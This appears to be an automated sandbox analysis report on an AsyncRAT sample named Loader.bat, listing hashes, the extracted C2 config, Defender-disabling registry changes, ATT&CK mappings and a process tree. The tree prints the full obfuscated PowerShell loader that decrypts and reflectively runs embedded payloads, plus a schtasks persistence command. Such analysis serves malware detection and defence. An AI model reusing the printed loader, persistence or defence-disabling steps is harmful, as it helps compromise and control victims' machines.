asyncrat | 0af4119b3a1eded45cb97a0ef9b022505470d0987cedd5bf1af0ac8c8efb322e

Analysis

max time kernel
638s
max time network
689s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
28-11-2024 19:40

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Loader.bat
Size

919KB
MD5

0563db3c877e66a892a597fdcf52ab47
SHA1

6d29695797709cf741081ec8d60e57230c0bf612
SHA256

0af4119b3a1eded45cb97a0ef9b022505470d0987cedd5bf1af0ac8c8efb322e
SHA512

a3e3227d410543602cc3245a061304257fa3be6ea256776bb934a226f4e2cf2fd148de257766e546e5b6a99b98a98526e12dc15acd963c997e37e52a7feaf96e
SSDEEP

24576:RKgJjCEe4LWZywOUpRWwjxyLscvANgDP7bB:sgle4QWsyYSl

Score

10^/10

asyncrat default discovery evasion execution rat trojan

Malware Config

Extracted

Family

asyncrat

Version

0.5.8

Botnet

Default

66.66.146.74:9511

Mutex

nwJFeGdDXcL2

Attributes

delay
3
install
true
install_file
System32.exe
install_folder
%AppData%

aes.plain

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat
Asyncrat family
asyncrat

Modifies Windows Defender Real-time Protection settings 3 TTPs 12 IoCs

evasion trojan

Modify Registry

T1112

Windows Service

T1543.003

Disable or Modify Tools

T1562.001

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	winDefKiller.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	winDefKiller.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	winDefKiller.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	winDefKiller.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	winDefKiller.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	winDefKiller.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	winDefKiller.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	winDefKiller.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	winDefKiller.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	winDefKiller.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	winDefKiller.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	winDefKiller.exe

Async RAT payload 1 IoCs

rat

resource	yara_rule
behavioral1/files/0x0008000000023bdf-33.dat	family_asyncrat

Checks computer location settings 2 TTPs 4 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation	sa.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation	XBinderOutput.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation	ddas.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation	Start.exe

Executes dropped EXE 7 IoCs

pid	Process
2356	sa.exe
3704	Start.exe
5088	ddas.exe
3632	XBinderOutput.exe
1708	winDefKiller.exe
3416	winDefKiller.exe
3504	System32.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
2176	powershell.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 6 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	timeout.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	System32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Start.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
2168	timeout.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
4680	schtasks.exe

Suspicious behavior: EnumeratesProcesses 35 IoCs

pid	Process
2176	powershell.exe
2176	powershell.exe
3704	Start.exe
3704	Start.exe
3704	Start.exe
3704	Start.exe
3704	Start.exe
3704	Start.exe
3704	Start.exe
3704	Start.exe
3704	Start.exe
3704	Start.exe
3704	Start.exe
3704	Start.exe
3704	Start.exe
3704	Start.exe
3704	Start.exe
3704	Start.exe
3704	Start.exe
3704	Start.exe
3704	Start.exe
3704	Start.exe
3704	Start.exe
3704	Start.exe
3704	Start.exe
3228	msedge.exe
3228	msedge.exe
4960	msedge.exe
4960	msedge.exe
3720	identity_helper.exe
3720	identity_helper.exe
2412	msedge.exe
2412	msedge.exe
2412	msedge.exe
2412	msedge.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs

pid	Process
4960	msedge.exe
4960	msedge.exe
4960	msedge.exe
4960	msedge.exe
4960	msedge.exe
4960	msedge.exe
4960	msedge.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	2176	powershell.exe
Token: SeDebugPrivilege	3704	Start.exe
Token: SeDebugPrivilege	3504	System32.exe

Suspicious use of FindShellTrayWindow 25 IoCs

pid	Process
4960	msedge.exe
4960	msedge.exe
4960	msedge.exe
4960	msedge.exe
4960	msedge.exe
4960	msedge.exe
4960	msedge.exe
4960	msedge.exe
4960	msedge.exe
4960	msedge.exe
4960	msedge.exe
4960	msedge.exe
4960	msedge.exe
4960	msedge.exe
4960	msedge.exe
4960	msedge.exe
4960	msedge.exe
4960	msedge.exe
4960	msedge.exe
4960	msedge.exe
4960	msedge.exe
4960	msedge.exe
4960	msedge.exe
4960	msedge.exe
4960	msedge.exe

Suspicious use of SendNotifyMessage 24 IoCs

pid	Process
4960	msedge.exe
4960	msedge.exe
4960	msedge.exe
4960	msedge.exe
4960	msedge.exe
4960	msedge.exe
4960	msedge.exe
4960	msedge.exe
4960	msedge.exe
4960	msedge.exe
4960	msedge.exe
4960	msedge.exe
4960	msedge.exe
4960	msedge.exe
4960	msedge.exe
4960	msedge.exe
4960	msedge.exe
4960	msedge.exe
4960	msedge.exe
4960	msedge.exe
4960	msedge.exe
4960	msedge.exe
4960	msedge.exe
4960	msedge.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4196 wrote to memory of 2176	4196	cmd.exe	84
PID 4196 wrote to memory of 2176	4196	cmd.exe	84
PID 2176 wrote to memory of 2356	2176	powershell.exe	89
PID 2176 wrote to memory of 2356	2176	powershell.exe	89
PID 2176 wrote to memory of 3704	2176	powershell.exe	90
PID 2176 wrote to memory of 3704	2176	powershell.exe	90
PID 2176 wrote to memory of 3704	2176	powershell.exe	90
PID 2356 wrote to memory of 5088	2356	sa.exe	92
PID 2356 wrote to memory of 5088	2356	sa.exe	92
PID 2356 wrote to memory of 3632	2356	sa.exe	93
PID 2356 wrote to memory of 3632	2356	sa.exe	93
PID 3632 wrote to memory of 1708	3632	XBinderOutput.exe	96
PID 3632 wrote to memory of 1708	3632	XBinderOutput.exe	96
PID 5088 wrote to memory of 3416	5088	ddas.exe	98
PID 5088 wrote to memory of 3416	5088	ddas.exe	98
PID 3704 wrote to memory of 1988	3704	Start.exe	100
PID 3704 wrote to memory of 1988	3704	Start.exe	100
PID 3704 wrote to memory of 1988	3704	Start.exe	100
PID 3704 wrote to memory of 1372	3704	Start.exe	102
PID 3704 wrote to memory of 1372	3704	Start.exe	102
PID 3704 wrote to memory of 1372	3704	Start.exe	102
PID 1372 wrote to memory of 2168	1372	cmd.exe	104
PID 1372 wrote to memory of 2168	1372	cmd.exe	104
PID 1372 wrote to memory of 2168	1372	cmd.exe	104
PID 1988 wrote to memory of 4680	1988	cmd.exe	105
PID 1988 wrote to memory of 4680	1988	cmd.exe	105
PID 1988 wrote to memory of 4680	1988	cmd.exe	105
PID 1372 wrote to memory of 3504	1372	cmd.exe	106
PID 1372 wrote to memory of 3504	1372	cmd.exe	106
PID 1372 wrote to memory of 3504	1372	cmd.exe	106
PID 4960 wrote to memory of 2732	4960	msedge.exe	111
PID 4960 wrote to memory of 2732	4960	msedge.exe	111
PID 4960 wrote to memory of 1144	4960	msedge.exe	112
PID 4960 wrote to memory of 1144	4960	msedge.exe	112
PID 4960 wrote to memory of 1144	4960	msedge.exe	112
PID 4960 wrote to memory of 1144	4960	msedge.exe	112
PID 4960 wrote to memory of 1144	4960	msedge.exe	112
PID 4960 wrote to memory of 1144	4960	msedge.exe	112
PID 4960 wrote to memory of 1144	4960	msedge.exe	112
PID 4960 wrote to memory of 1144	4960	msedge.exe	112
PID 4960 wrote to memory of 1144	4960	msedge.exe	112
PID 4960 wrote to memory of 1144	4960	msedge.exe	112
PID 4960 wrote to memory of 1144	4960	msedge.exe	112
PID 4960 wrote to memory of 1144	4960	msedge.exe	112
PID 4960 wrote to memory of 1144	4960	msedge.exe	112
PID 4960 wrote to memory of 1144	4960	msedge.exe	112
PID 4960 wrote to memory of 1144	4960	msedge.exe	112
PID 4960 wrote to memory of 1144	4960	msedge.exe	112
PID 4960 wrote to memory of 1144	4960	msedge.exe	112
PID 4960 wrote to memory of 1144	4960	msedge.exe	112
PID 4960 wrote to memory of 1144	4960	msedge.exe	112
PID 4960 wrote to memory of 1144	4960	msedge.exe	112
PID 4960 wrote to memory of 1144	4960	msedge.exe	112
PID 4960 wrote to memory of 1144	4960	msedge.exe	112
PID 4960 wrote to memory of 1144	4960	msedge.exe	112
PID 4960 wrote to memory of 1144	4960	msedge.exe	112
PID 4960 wrote to memory of 1144	4960	msedge.exe	112
PID 4960 wrote to memory of 1144	4960	msedge.exe	112
PID 4960 wrote to memory of 1144	4960	msedge.exe	112
PID 4960 wrote to memory of 1144	4960	msedge.exe	112
PID 4960 wrote to memory of 1144	4960	msedge.exe	112
PID 4960 wrote to memory of 1144	4960	msedge.exe	112
PID 4960 wrote to memory of 1144	4960	msedge.exe	112
PID 4960 wrote to memory of 1144	4960	msedge.exe	112

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Loader.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:4196
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('bvIV9xmfGsAMQjk2GZ+mu75BliblCnV50HBCLug3GZI='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('wG4bwKUNwLEOHlh+OUY6hw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $CLCMN=New-Object System.IO.MemoryStream(,$param_var); $pAUnj=New-Object System.IO.MemoryStream; $eoTaK=New-Object System.IO.Compression.GZipStream($CLCMN, [IO.Compression.CompressionMode]::Decompress); $eoTaK.CopyTo($pAUnj); $eoTaK.Dispose(); $CLCMN.Dispose(); $pAUnj.Dispose(); $pAUnj.ToArray();}function execute_function($param_var,$param2_var){ $UzjPE=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $rcIWS=$UzjPE.EntryPoint; $rcIWS.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Loader.bat';$ujaGE=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Loader.bat').Split([Environment]::NewLine);foreach ($pudhF in $ujaGE) { if ($pudhF.StartsWith(':: ')) { $RMQoK=$pudhF.Substring(3); break; }}$payloads_var=[string[]]$RMQoK.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2176
- - C:\Users\Admin\AppData\Local\Temp\sa.exe
    "C:\Users\Admin\AppData\Local\Temp\sa.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:2356
  - - C:\Users\Admin\AppData\Local\Temp\ddas.exe
      "C:\Users\Admin\AppData\Local\Temp\ddas.exe"
      4⤵
      Checks computer location settings
      Executes dropped EXE
      Suspicious use of WriteProcessMemory
      PID:5088
    - - C:\Users\Admin\AppData\Local\Temp\winDefKiller.exe
        
        "C:\Users\Admin\AppData\Local\Temp\winDefKiller.exe"
        5⤵
        Modifies Windows Defender Real-time Protection settings
        Executes dropped EXE
        
        PID:3416
  - - C:\Users\Admin\AppData\Local\Temp\XBinderOutput.exe
      "C:\Users\Admin\AppData\Local\Temp\XBinderOutput.exe"
      4⤵
      Checks computer location settings
      Executes dropped EXE
      Suspicious use of WriteProcessMemory
      PID:3632
    - - C:\Users\Admin\AppData\Local\Temp\winDefKiller.exe
        
        "C:\Users\Admin\AppData\Local\Temp\winDefKiller.exe"
        5⤵
        Modifies Windows Defender Real-time Protection settings
        Executes dropped EXE
        
        PID:1708
- - C:\Users\Admin\AppData\Local\Temp\Start.exe
    "C:\Users\Admin\AppData\Local\Temp\Start.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:3704
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "System32" /tr '"C:\Users\Admin\AppData\Roaming\System32.exe"' & exit
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:1988
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "System32" /tr '"C:\Users\Admin\AppData\Roaming\System32.exe"'
        5⤵
        System Location Discovery: System Language Discovery
        Scheduled Task/Job: Scheduled Task
        
        PID:4680
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpDD60.tmp.bat""
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:1372
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout 3
        5⤵
        System Location Discovery: System Language Discovery
        Delays execution with timeout.exe
        
        PID:2168
    - - C:\Users\Admin\AppData\Roaming\System32.exe
        
        "C:\Users\Admin\AppData\Roaming\System32.exe"
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:3504

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default
1⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4960
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffa0ab046f8,0x7ffa0ab04708,0x7ffa0ab04718
  2⤵
  PID:2732
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2120,5360939576258687889,12211070791487702431,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2160 /prefetch:2
  2⤵
  PID:1144
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2120,5360939576258687889,12211070791487702431,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2276 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3228
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2120,5360939576258687889,12211070791487702431,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2696 /prefetch:8
  2⤵
  PID:4304
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,5360939576258687889,12211070791487702431,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3336 /prefetch:1
  2⤵
  PID:3796
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,5360939576258687889,12211070791487702431,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3352 /prefetch:1
  2⤵
  PID:2656
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,5360939576258687889,12211070791487702431,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4956 /prefetch:1
  2⤵
  PID:512
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,5360939576258687889,12211070791487702431,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4516 /prefetch:1
  2⤵
  PID:2224
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2120,5360939576258687889,12211070791487702431,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4320 /prefetch:8
  2⤵
  PID:3416
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2120,5360939576258687889,12211070791487702431,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4320 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3720
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,5360939576258687889,12211070791487702431,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5264 /prefetch:1
  2⤵
  PID:876
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,5360939576258687889,12211070791487702431,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5252 /prefetch:1
  2⤵
  PID:4272
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,5360939576258687889,12211070791487702431,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4064 /prefetch:1
  2⤵
  PID:3416
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2120,5360939576258687889,12211070791487702431,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=4396 /prefetch:2
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2412

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:2456

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:3188

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Credential Access

Discovery

Browser Information Discovery

T1217

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
ba6ef346187b40694d493da98d5da979

SHA1
643c15bec043f8673943885199bb06cd1652ee37

SHA256
d86eec91f295dfda8ed1c5fa99de426f2fe359282c7ebf67e3a40be739475d73

SHA512
2e6cc97330be8868d4b9c53be7e12c558f6eb1ac2c4080a611ba6c43561d0c5bb4791b8a11a8c2371599f0ba73ed1d9a7a2ea6dee2ae6a080f1912e0cb1f656c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\1a9e662c-3ff1-46b5-88b4-da8463f1a129.tmp

Filesize
5KB

MD5
0214374fd170ffd29a0f09efe1163ed6

SHA1
c4fa4f4cc2341c3dce971b9f927280f1b4d9adea

SHA256
8ff940af9d44edd3feb38eab0f3077fb86e46238ef9c204c8dc321a357a2db95

SHA512
bc847b4048b1b0b63d724dffde5a829b6d4e6a3f7388d478b13d02b144259bc9ee179e267175445adb9d1623adeb2639510db5f3345c32222e6745d6da300397

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
1729dffb99046242754794e8e5985fa6

SHA1
3d15fee64119ba5998b29eca770b186b987d2f98

SHA256
09f331d008d5913917782db7f5310c4b81698c057ab15e0950761843b5b4ef70

SHA512
7323aafc581899e95cfb4c601bf2fe9f9fa7ede46c4828ce5668459583bb278f4bd812e2cef32f3ab926029469ce244037760e2efed2e36fa28faf41d7f02c04

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
46295cac801e5d4857d09837238a6394

SHA1
44e0fa1b517dbf802b18faf0785eeea6ac51594b

SHA256
0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

SHA512
8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
206702161f94c5cd39fadd03f4014d98

SHA1
bd8bfc144fb5326d21bd1531523d9fb50e1b600a

SHA256
1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167

SHA512
0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
10KB

MD5
a3cf2c93c1ce24793f9255a5f772876a

SHA1
7b90a1b2d94cc4f347a18a8d2a65e0122501aa9a

SHA256
d167c72401f559940d1307f2a9975439500e771d7f1109e19aa18a482f61b8d3

SHA512
96e7be60a041fea187a38055fbabc7a8150a444364554c08591f42c0799a17399405b996419047cdd36b6e19fd7aca7be0b62f980e9fcc0536e3ec19f92f7836

Download Submit
C:\Users\Admin\AppData\Local\Temp\Start.exe

Filesize
45KB

MD5
b733e729705bf66c1e5c66d97e247701

SHA1
25eec814abdf1fc6afe621e16aa89c4eb42616b9

SHA256
9081f9cf986ed111d976a07ee26fc2b1b9992301344197d6d3f83fe0d2616023

SHA512
